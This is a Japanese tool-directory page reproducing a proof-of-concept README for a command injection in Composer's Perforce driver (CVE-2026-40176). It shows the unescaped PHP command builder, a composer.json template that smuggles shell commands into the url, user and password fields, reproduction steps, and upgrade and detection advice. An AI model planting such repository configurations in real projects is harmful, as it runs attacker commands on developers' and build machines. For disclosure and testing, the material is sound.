Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2026-40176-cve-2026-40261 — Proof-of-concept demonstrating command injection in Composer's Perforce driver (CVE-2026-40176), enabling remote code execution via crafted repository configuration. | Kitploit
ツール/GitHubGitHub/dapthehuman/cve-2026-40176-cve-2026-40261
脆弱性分析エクスプロイトウェブアプリケーション悪用コマンド&コントロールペイロード開発
GitHubdapthehuman/cve-2026-40176-cve-2026-40261

cve-2026-40176-cve-2026-40261

Proof-of-concept demonstrating command injection in Composer's Perforce driver (CVE-2026-40176), enabling remote code execution via crafted repository configuration.

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-40176

Composer Perforce リポジトリのリモートコード実行(RCE)

Composer Version Severity Type


📋 概要

Composer の Perforce リポジトリドライバにおけるコマンドインジェクションの脆弱性。リポジトリ URL 処理における入力検証の不備により、リモートコード実行(RCE)が可能になります。


🎯 脆弱性の詳細

プロパティ値
CVE IDCVE-2026-40176
影響を受けるバージョンComposer < 2.2.27
脆弱性の種類コマンドインジェクション
攻撃ベクトル悪意のあるリポジトリ設定
影響任意のコード実行
CVSS スコア高/重大

🔍 技術的説明

この脆弱性は、Composer が perforce タイプを処理する際に存在します。このパラメータはシェルコマンドに渡される前に適切にサニタイズされないため、攻撃者が任意のシステムコマンドを注入できるようになります。

root@kitploit:~

    public function generateP4Command($command, $useClient = true)
    {
        $p4Command = 'p4 ';
        $p4Command .= '-u ' . $this->getUser() . ' ';
        if ($useClient) 
            $p4Command .= '-c ' . $this->getClient() . ' ';
        }
        $p4Command .= '-p ' . $this->getPort() . ' ' . $command;

        return $p4Command;
    }

これらはすべて適切にエスケープされておらず、攻撃者が perforce タイプのすべてのフィールドに悪意のあるペイロードを仕込むことでコマンドを注入できるようになっています。

脆弱なコードパターン:

root@kitploit:~
{
  "repositories": [
    {
      "type": "perforce",
      "url": "PERFORCE_URL; INJECTED_COMMAND #",
      "depot": "depot",
      "p4user": "user; INJECRTED_COMMAND #",
      "p4password": "password; INJECTED_COMMAND #",
    }
  ]
}

🚀 概念実証

このリポジトリには、この脆弱性を実証する動作する概念実証が含まれています。

プロジェクト構成

root@kitploit:~
CVE-2026-40176/
├── composer.json              # 悪意のある Perforce リポジトリ設定
├── vuln-composer.phar         # Composer 2.2.26(脆弱)
├── patched-composer.phar      # Composer 2.2.27(パッチ適用済み)
└── README.md                  # このファイル

再現手順

1. リポジトリのクローン

root@kitploit:~
git clone <repository-url>
cd CVE-2026-40176

2. Composer バージョンの確認

root@kitploit:~
php vuln-composer.phar --version
# 出力: Composer version 2.2.26

php patched-composer.phar --version
# 出力: Composer version 2.2.27

3. 脆弱なバージョンのテスト

root@kitploit:~
php vuln-composer.phar install
# または
php vuln-composer.phar update

4. 悪用の確認

root@kitploit:~
ls -la /tmp/pwned

5. パッチ適用済みバージョンのテスト(失敗するはず)

root@kitploit:~
rm -f /tmp/pwned
php patched-composer.phar update
ls -la /tmp/pwned
# ファイルは存在しないはず(脆弱性はパッチ適用済み)

🛡️ 緩和策

即時対応

  1. Composer をバージョン 2.2.27 以降にアップグレード:

    root@kitploit:~
    composer self-update --2.2.27
    # または
    wget https://getcomposer.org/download/2.2.27/composer.phar
    
  2. すべての composer.json ファイルを確認し、不明または不審なリポジトリ設定がないかチェック

  3. サプライチェーンを監査 - 依存関係が信頼できないリポジトリを参照していないか確認

検出

root@kitploit:~
# Composer バージョンの確認
composer --version

# プロジェクト内の Perforce リポジトリを検索
grep -r "perforce" */composer.json
ツールをダウンロード